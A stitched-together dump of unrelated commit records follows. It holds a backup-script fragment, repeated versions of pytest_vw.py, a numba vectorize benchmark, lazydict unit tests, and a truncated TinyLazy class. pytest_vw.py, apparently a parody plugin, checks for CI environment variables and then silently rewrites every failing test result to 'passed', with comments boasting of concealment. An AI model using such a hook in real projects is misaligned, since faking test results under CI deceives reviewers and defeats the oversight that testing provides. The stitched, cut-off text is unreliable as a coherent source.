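timeout = 3600 * 24 * 3  # same three-day period as in the record

print('Restic Scheduler')
print('-' * 30)
print(f'Timeout: {timeout}')                 # f-string form of .format()
print(f'Starting Backup at {time.ctime()}')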
2c9d5a8b167f77a69995d55e2b2ef52c90807124
|
pytest_vw.py
|
pytest_vw.py
|
# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
_config = None
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in _config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_configure(config):
global _config
_config = config
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
|
# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in item.config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
|
Use item.config to access config.
|
Use item.config to access config.
Fixes #1.
|
Python
|
mit
|
The-Compiler/pytest-vw
|
# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
_config = None
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in _config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_configure(config):
global _config
_config = config
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
Use item.config to access config.
Fixes #1.
|
# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in item.config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
|
<commit_before># -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
_config = None
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in _config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_configure(config):
global _config
_config = config
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
<commit_msg>Use item.config to access config.
Fixes #1.<commit_after>
|
# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in item.config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
|
# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
_config = None
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in _config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_configure(config):
global _config
_config = config
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
Use item.config to access config.
Fixes #1.# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in item.config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
|
<commit_before># -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
_config = None
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in _config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_configure(config):
global _config
_config = config
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
<commit_msg>Use item.config to access config.
Fixes #1.<commit_after># -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in item.config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
|
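Why the fix in this record works: a collected test item always carries the active config as `item.config`, so the hookwrapper no longer depends on `pytest_configure` having stashed a module-level global. A self-contained conftest.py sketch of the same pattern (assumption: pytest installed; it mirrors only the hook and ini calls already shown above, and attaches a report section instead of flipping outcomes):

# conftest.py: reading an ini option via item.config inside a hookwrapper
import pytest

def pytest_addoption(parser):
    parser.addini('vw_examinators', 'List of additional VW examinators.')

@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
    outcome = yield                      # let the real hook build the report
    report = outcome.get_result()
    names = [line.strip()
             for line in item.config.getini('vw_examinators').split('\n')
             if line.strip()]
    # record what was read, rather than changing the test outcome
    report.sections.append(('vw', 'examinators: ' + ', '.join(names)))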
e87490ea157f4882f644329e4b447f51c0a2acb3
|
benchmarks/bench_vectorize.py
|
benchmarks/bench_vectorize.py
|
"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
del _binary_func
|
"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
@vectorize(["float32(float32, float32)",
"float64(float64, float64)"])
def rel_diff(x, y):
# XXX for float32 performance, we should write `np.float32(2)`, but
# that's not the natural way to write this code...
return 2 * (x - y) / (x + y)
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0.1, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
time_rel_diff_float32 = _binary_func(rel_diff, 'float32')
time_rel_diff_float64 = _binary_func(rel_diff, 'float64')
del _binary_func
|
Add a relative difference vectorization benchmark
|
Add a relative difference vectorization benchmark
|
Python
|
bsd-2-clause
|
gmarkall/numba-benchmark,numba/numba-benchmark
|
"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
del _binary_func
Add a relative difference vectorization benchmark
|
"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
@vectorize(["float32(float32, float32)",
"float64(float64, float64)"])
def rel_diff(x, y):
# XXX for float32 performance, we should write `np.float32(2)`, but
# that's not the natural way to write this code...
return 2 * (x - y) / (x + y)
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0.1, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
time_rel_diff_float32 = _binary_func(rel_diff, 'float32')
time_rel_diff_float64 = _binary_func(rel_diff, 'float64')
del _binary_func
|
<commit_before>"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
del _binary_func
<commit_msg>Add a relative difference vectorization benchmark<commit_after>
|
"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
@vectorize(["float32(float32, float32)",
"float64(float64, float64)"])
def rel_diff(x, y):
# XXX for float32 performance, we should write `np.float32(2)`, but
# that's not the natural way to write this code...
return 2 * (x - y) / (x + y)
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0.1, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
time_rel_diff_float32 = _binary_func(rel_diff, 'float32')
time_rel_diff_float64 = _binary_func(rel_diff, 'float64')
del _binary_func
|
"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
del _binary_func
Add a relative difference vectorization benchmark"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
@vectorize(["float32(float32, float32)",
"float64(float64, float64)"])
def rel_diff(x, y):
# XXX for float32 performance, we should write `np.float32(2)`, but
# that's not the natural way to write this code...
return 2 * (x - y) / (x + y)
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0.1, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
time_rel_diff_float32 = _binary_func(rel_diff, 'float32')
time_rel_diff_float64 = _binary_func(rel_diff, 'float64')
del _binary_func
|
<commit_before>"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
del _binary_func
<commit_msg>Add a relative difference vectorization benchmark<commit_after>"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
@vectorize(["float32(float32, float32)",
"float64(float64, float64)"])
def rel_diff(x, y):
# XXX for float32 performance, we should write `np.float32(2)`, but
# that's not the natural way to write this code...
return 2 * (x - y) / (x + y)
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0.1, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
time_rel_diff_float32 = _binary_func(rel_diff, 'float32')
time_rel_diff_float64 = _binary_func(rel_diff, 'float64')
del _binary_func
|
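Two details of the benchmark change worth spelling out: `rel_diff` divides by `x + y`, which is why `setup` now starts the samples at 0.1 instead of 0 (the old first sample would give 0/0), and the formula itself is plain ufunc arithmetic. A pure-NumPy check of the same expression (no numba required):

import numpy as np

def rel_diff(x, y):
    # same formula as the vectorized version in the record
    return 2 * (x - y) / (x + y)

x = np.linspace(0.1, 1, 5, dtype='float64')
print(rel_diff(x, x))       # identical inputs: all zeros
print(rel_diff(0.3, 0.1))   # 2 * 0.2 / 0.4 == 1.0, up to float rounding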
f94c946d135aed30f4d9068844b563fa94e39ff1
|
test.py
|
test.py
|
from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(str(d), "{'a': 1}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(repr(d), "LazyDictionary({'a': 1})")
|
from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(str(d), "{'a': {'b': 1}}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(repr(d), "LazyDictionary({'a': {'b': 1}})")
|
Check recursion in str() and repr()
|
Check recursion in str() and repr()
|
Python
|
mit
|
janrain/lazydict
|
from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(str(d), "{'a': 1}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(repr(d), "LazyDictionary({'a': 1})")
Check recursion in str() and repr()
|
from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(str(d), "{'a': {'b': 1}}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(repr(d), "LazyDictionary({'a': {'b': 1}})")
|
<commit_before>from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(str(d), "{'a': 1}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(repr(d), "LazyDictionary({'a': 1})")
<commit_msg>Check recursion in str() and repr()<commit_after>
|
from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(str(d), "{'a': {'b': 1}}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(repr(d), "LazyDictionary({'a': {'b': 1}})")
|
from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(str(d), "{'a': 1}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(repr(d), "LazyDictionary({'a': 1})")
Check recursion in str() and repr()from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(str(d), "{'a': {'b': 1}}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(repr(d), "LazyDictionary({'a': {'b': 1}})")
|
<commit_before>from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(str(d), "{'a': 1}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(repr(d), "LazyDictionary({'a': 1})")
<commit_msg>Check recursion in str() and repr()<commit_after>from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(str(d), "{'a': {'b': 1}}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(repr(d), "LazyDictionary({'a': {'b': 1}})")
|
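The ordering in test_lazy_evaluation (define 'sum' before 'a' and 'b') is the point of the library: callables are stored as-is and only resolved on first access. A tiny stand-alone analogue of that idea, not the lazydict implementation, with no circular-reference or redefinition guards:

class TinyLazy(dict):
    # Hypothetical minimal stand-in: callables are evaluated on first read.
    def __getitem__(self, key):
        value = dict.__getitem__(self, key)
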